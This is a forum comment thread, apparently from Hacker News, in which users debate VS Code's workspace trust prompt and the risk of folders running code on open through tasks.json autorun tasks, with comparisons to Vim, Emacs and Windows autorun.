Comment by dfajgljsldkjag
17 days ago
It is scary that a text editor can run hidden code just by opening a folder. We traded our safety for convenience and now we are paying the price. Users will always click the button to trust a file if they think it helps them work faster. We cannot blame them when the software design makes it so easy to make a mistake.
Tooooo be fair
Vim had also had its share of execution vulnerabilities over the years.
https://github.com/numirias/security/blob/master/doc/2019-06...
Yep, it's a shame that we keep making the same mistakes when it comes to basic security practices.
Was going to say the same thing about emacs: https://news.ycombinator.com/item?id=42256409
What is share dot google? Here's the real link: https://news.ycombinator.com/item?id=42256409
1 reply →
Doesn't it ask you if you trust a folder when you open it?
You are right that the computer asks you. But people click yes because they are used to ignoring warning signs. The software relies on people making perfect choices every time and that never happens.
It should tell me what should I look before I trust it. Not trusting the workspace means I might as well use Notepad to open it. I wouldn't think that tasks.json include autorun tasks in addition to build actions.
Who remembers autorun.exe
I always wondered why. Now I finally know that it auto runs code in that folder.
Who thought this is a good idea and why wasn't it specified in ALL CAPS in that dialog?
Is it even documented anywhere?
Very infrequent vscode user here, beginning to think it's some kind of Eclipse.
I mean it's not in caps, but it's literally the first line in the dialog after the header:
https://code.visualstudio.com/docs/editing/workspaces/worksp...
I'm big on user first, if that dialog had sirens blaring, a gif and ten arrows pointing that "THIS MAY EXECUTE CODE" and people still didn't get the idea, I'd say it needs fixing. It can't be said that they didn't try or that they hid it though.
2 replies →
Yeah but it's one of those useless permission requests along the lines of "Do you want this program to work or not?"
They're pawning off responsibility without giving people a real choice.
It's like the old permission dialog for Android that was pretty much "do you want to use this app?". Obviously most people just say yes.
There's a reason Google changed that.
To be fair I'm sure Microsoft would switch to a saner permission model if they could but it's kind of too late.
It's not a false choice - "Trust" and "don't trust" are both perfectly viable options. The editor works fine in restricted mode, you just won't have all your extensions enabled.
> We traded our safety for convenience
Not the first time. Same with LLMs.